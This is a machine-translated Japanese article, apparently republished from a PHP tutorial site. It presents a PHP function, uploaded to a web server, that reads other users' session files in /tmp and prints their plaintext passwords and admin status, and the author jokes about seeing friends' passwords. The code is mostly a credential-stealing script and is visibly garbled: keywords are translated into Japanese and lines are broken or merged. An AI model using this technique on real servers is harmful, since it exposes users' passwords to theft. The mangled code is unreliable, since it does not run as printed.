この関数を記述できる理由は、主に Web サイトのセッション構造が次のように明確であるためです: name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:" 1" は、セッションが保存されている場所も知っており、ファイルをアップロードすることもできるので、そのときに少しハッキングしましたが、オンラインの友達のパスワードが一目でわかります (笑):
function submit1 (){
グローバル $username;
print "
/title>"
$i=0;
if($username=="tasm"||$username=="Tasm") {
print "あなたも怪しいですか? 私もチェックしていますか?"
$path="/tmp/" return; - >read()){
if(substr($entry,0,4)=="sess"){
$entry=$path.$entry;
if ( !empty($ary[0])){
$ary =explode(";",$ary[0]);
$name=explode(":",$ary[0]); name [2]==""".$username."""){
$passwd=explode(":",$ary[1]);
$mode=explode(":",$ary[3] ) ;
print "ユーザーのペン名:".$name[2]."
使用パスワード:".$passwd[2]."
使用モード:"; ]= =1)
print "管理者";
else
print "一般ユーザー";
他人のパスワードを盗むことは非倫理的です
$i=1;
break;
}}}}
if(!$i)
print "ユーザー: ".$username." 本当にオンラインですか? 確かな場合は、もう一度実行してください、これ以上スペースは入れません! ";
$d->close();
}
function login( ){
?>
/title>
http://www.bkjia.com/PHPjc/445163.html
www.bkjia.com
true
http://www.bkjia.com/PHPjc/445163.html
技術記事
この関数を作成できる主な理由は、Web サイトのセッション構造 (name|s:4:tasm;passwd|s:6:111111;mode|s:1:1 など) を明確に知っているためです。セッションが保存されている場所もわかります...
声明:この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。